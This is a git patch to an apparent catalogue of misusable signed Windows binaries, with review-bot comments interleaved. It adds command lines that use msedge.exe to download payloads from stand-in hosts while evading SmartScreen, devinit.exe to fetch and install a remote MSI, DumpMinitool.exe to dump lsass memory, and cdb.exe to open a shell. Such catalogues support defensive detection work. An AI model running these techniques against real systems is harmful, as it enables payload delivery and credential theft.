From 787c87470e87def61051fb1cff36566a43bf390e Mon Sep 17 00:00:00 2001
From: mrd0x
Date: Fri, 31 Mar 2023 08:46:21 -0400
Subject: [PATCH] Several LOLBINs additions & modifications (#192)
Co-authored-by: Wietze
---
 yml/OSBinaries/Explorer.yml | 4 +--
 yml/OSBinaries/Msedge.yml | 29 +++++++++++++++++++
 yml/OtherMSBinaries/Adplus.yml | 2 +-
 yml/OtherMSBinaries/Cdb.yml | 8 ++---
 yml/OtherMSBinaries/Createdump.yml | 7 +++--
 yml/OtherMSBinaries/Devinit.yml | 21 ++++++++++++++
 yml/OtherMSBinaries/DumpMinitool.yml | 20 +++++++++++++
 .../Microsoft.NodejsTools.PressAnyKey.yml | 21 ++++++++++++++
 8 files changed, 102 insertions(+), 10 deletions(-)
 create mode 100644 yml/OSBinaries/Msedge.yml
 create mode 100644 yml/OtherMSBinaries/Devinit.yml
 create mode 100644 yml/OtherMSBinaries/DumpMinitool.yml
 create mode 100644 yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml
index 0cac39e..d1e025c 100644
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@@ -1,7 +1,7 @@
 ---
 Name: Explorer.exe
 Description: Binary used for managing files and system components within Windows
-Author: 'Jai Minton'
+Author: Jai Minton
 Created: 2020-06-24
 Commands:
 - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
@@ -21,8 +21,6 @@ Commands:
 Full_Path:
 - Path: C:\Windows\explorer.exe
 - Path: C:\Windows\SysWOW64\explorer.exe
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer_break_proctree.yml
 - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_explorer.yml
diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml
new file mode 100644
index 0000000..4ec4118
--- /dev/null
+++ b/yml/OSBinaries/Msedge.yml
@@ -0,0 +1,29 @@
+---
+Name: Msedge.exe
+Description: Microsoft Edge browser
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+ - Command: msedge.exe https://example.com/file.exe.txt
+ Description: Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
+ Usecase: Download file from the internet
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ OperatingSystem: Windows 10, Windows 11
+ - Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://example.com/evil.b64.html" > out.b64
+ Description: Edge will silently download the file. File extension should be .html and binaries should be encoded.
+ Usecase: Download file from the internet
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
+ - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
+Resources:
+ - Link: https://twitter.com/mrd0x/status/1478116126005641220
+ - Link: https://twitter.com/mrd0x/status/1478234484881436672
+Acknowledgement:
+ - Person: mr.d0x
+ Handle: '@mrd0x'
diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml
index fc3a135..006c8b4 100644
--- a/yml/OtherMSBinaries/Adplus.yml
+++ b/yml/OtherMSBinaries/Adplus.yml
@@ -41,7 +41,7 @@ Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
 - IOC: As a Windows SDK binary, execution on a system may be suspicious
 Resources:
- - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
+ - Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/
 - Link: https://twitter.com/nas_bench/status/1534916659676422152
 - Link: https://twitter.com/nas_bench/status/1534915321856917506
 Acknowledgement:
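Review bot: The new Msedge.yml has no `Detection` section, while the existing entries touched by this patch (Explorer.yml, Adplus.yml, Createdump.yml) all carry Sigma or IOC guidance; the same gap applies to the new Devinit.yml, DumpMinitool.yml and Microsoft.NodejsTools.PressAnyKey.yml. Even without a Sigma link, an IOC derived from the documented command line gives defenders something to key on, e.g. `Detection:` followed by `  - IOC: msedge.exe started with --headless and --dump-dom arguments`. The two `Full_Path` entries also use a lowercase `c:` drive letter, unlike the `C:` used everywhere else in this patch; cosmetic, but worth aligning.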
diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml
index 8bfc5fd..c6b1e11 100644
--- a/yml/OtherMSBinaries/Cdb.yml
+++ b/yml/OtherMSBinaries/Cdb.yml
@@ -1,7 +1,7 @@
 ---
 Name: Cdb.exe
 Description: Debugging tool included with Windows Debugging Tools.
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
 - Command: cdb.exe -cf x64_calc.wds -o notepad.exe
@@ -12,8 +12,8 @@ Commands:
 MitreID: T1127
 OperatingSystem: Windows
 - Command: |
- cdb.exe -pd -pn
- .shell
+ cdb.exe -pd -pn
+ .shell
 Description: Attaching to any process and executing shell commands.
 Usecase: Run a shell command under a trusted Microsoft signed binary
 Category: Execute
@@ -41,7 +41,7 @@ Resources:
 - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
 - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
 - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
- - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
+ - Link: https://mrd0x.com/the-power-of-cdb-debugging-tool/
 - Link: https://twitter.com/nas_bench/status/1534957360032120833
 Acknowledgement:
 - Person: Matt Graeber
diff --git a/yml/OtherMSBinaries/Createdump.yml b/yml/OtherMSBinaries/Createdump.yml
index c5eabca..e89ae89 100644
--- a/yml/OtherMSBinaries/Createdump.yml
+++ b/yml/OtherMSBinaries/Createdump.yml
@@ -1,8 +1,8 @@
 ---
 Name: Createdump.exe
 Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
-Author: Daniel Santos
-Created: 2022-08-05
+Author: mr.d0x, Daniel Santos
+Created: 2022-01-20
 Commands:
 - Command: createdump.exe -n -f dump.dmp [PID]
 Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process.
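Review bot: In the Createdump.yml header hunk, `Created` moves backwards from 2022-08-05 to 2022-01-20 in the same change that prepends mr.d0x to `Author`. If `Created` records when the entry entered the repository, the earlier date rewrites that history; if it is meant to date the earliest research instead, a sentence in the commit description saying so would make the intent clear to readers diffing the two dates later. The rest of the Createdump.yml entry continues outside this hunk.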
@@ -13,6 +13,9 @@ Commands:
 OperatingSystem: Windows 10, Windows 11
 Full_Path:
 - Path: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
+ - Path: C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
+ - Path: C:\Program Files\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
+ - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml
 - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml
diff --git a/yml/OtherMSBinaries/Devinit.yml b/yml/OtherMSBinaries/Devinit.yml
new file mode 100644
index 0000000..6fe7783
--- /dev/null
+++ b/yml/OtherMSBinaries/Devinit.yml
@@ -0,0 +1,21 @@
+---
+Name: Devinit.exe
+Description: Visual Studio 2019 tool
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+ - Command: devinit.exe run -t msi-install -i https://example.com/out.msi
+ Description: Downloads an MSI file to C:\Windows\Installer and then installs it.
+ Usecase: Executes code from a (remote) MSI file.
+ Category: Execute
+ Privileges: User
+ MitreID: T1218.007
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
+ - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
+Resources:
+ - Link: https://twitter.com/mrd0x/status/1460815932402679809
+Acknowledgement:
+ - Person: mr.d0x
+ Handle: '@mrd0x'
diff --git a/yml/OtherMSBinaries/DumpMinitool.yml b/yml/OtherMSBinaries/DumpMinitool.yml
new file mode 100644
index 0000000..127972a
--- /dev/null
+++ b/yml/OtherMSBinaries/DumpMinitool.yml
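Review bot: The two added Visual Studio paths in Createdump.yml pin the runtime folder to `Microsoft.NETCore.App\6.0.0` while wildcarding the Visual Studio version with `*`, and the existing first path already uses `\*\createdump.exe` for the runtime version. Pinning 6.0.0 will miss copies of createdump.exe shipped under any other runtime version in the same tree, so detection rules or allow-lists built from these paths would be incomplete; `...\shared\Microsoft.NETCore.App\*\createdump.exe` matches the convention the entry already uses.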
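Review bot: Devinit.yml states `Privileges: User` while its Description says the MSI is written to C:\Windows\Installer and then installed; whether that completes as an unprivileged user presumably depends on the package being per-user rather than per-machine, so this should be confirmed or the Description should say which case was tested. The Description `Visual Studio 2019 tool` also pins a version that the `Full_Path` entries wildcard with `*`; if the tool ships with later releases too, a wording like `Visual Studio tool (2019 and later)` would agree with the paths, otherwise the wildcard is broader than documented.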
@@ -0,0 +1,20 @@
+---
+Name: DumpMinitool.exe
+Description: Dump tool part Visual Studio 2022
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+ - Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
+ Description: Creates a memory dump of the lsass process
+ Usecase: Create memory dump and parse it offline
+ Category: Dump
+ Privileges: Administrator
+ MitreID: T1003.001
+ OperatingSystem: Windows 10, Windows 11
+Full_Path:
+ - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
+Resources:
+ - Link: https://twitter.com/mrd0x/status/1511415432888131586
+Acknowledgement:
+ - Person: mr.d0x
+ Handle: '@mrd0x'
diff --git a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
new file mode 100644
index 0000000..896d921
--- /dev/null
+++ b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
@@ -0,0 +1,21 @@
+---
+Name: Microsoft.NodejsTools.PressAnyKey.exe
+Description: Part of the NodeJS Visual Studio tools.
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+ - Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe
+ Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.
+ Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.
+ Category: Execute
+ Privileges: User
+ MitreID: T1127
+ OperatingSystem: Windows
+Full_Path:
+ - Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
+ - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
+Resources:
+ - Link: https://twitter.com/mrd0x/status/1463526834918854661
+Acknowledgement:
+ - Person: mr.d0x
+ Handle: '@mrd0x'
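Review bot: The single `Full_Path` entry in DumpMinitool.yml ends in `...\TestPlatform\Extensions`, a directory, whereas every other `Path` in this patch ends in the binary's file name; it should end with `\DumpMinitool.exe`, and `2022` could use the `*` wildcard the sibling Visual Studio entries use. The example Command embeds a user-specific output path `c:\users\mr.d0x\dump.txt` and a fixed `--processId 1132` even though the Description says it targets lsass; a placeholder such as `[PID]`, as Createdump.yml already does, reads as a template rather than a transcript. `Description: Dump tool part Visual Studio 2022` is also missing a word: `Dump tool that is part of Visual Studio 2022`.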
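Review bot: Microsoft.NodejsTools.PressAnyKey.yml sets `OperatingSystem: Windows` while the other three new entries in this patch use `Windows 10, Windows 11`; unless the tool was verified on older Windows releases, aligning the value keeps the set consistent for anyone filtering by OS. The `Full_Path` entries spell the directory `NodeJsTools` while the file name uses `NodejsTools`; harmless on a case-insensitive file system, but worth confirming against an installed copy before it is used in a case-sensitive path match.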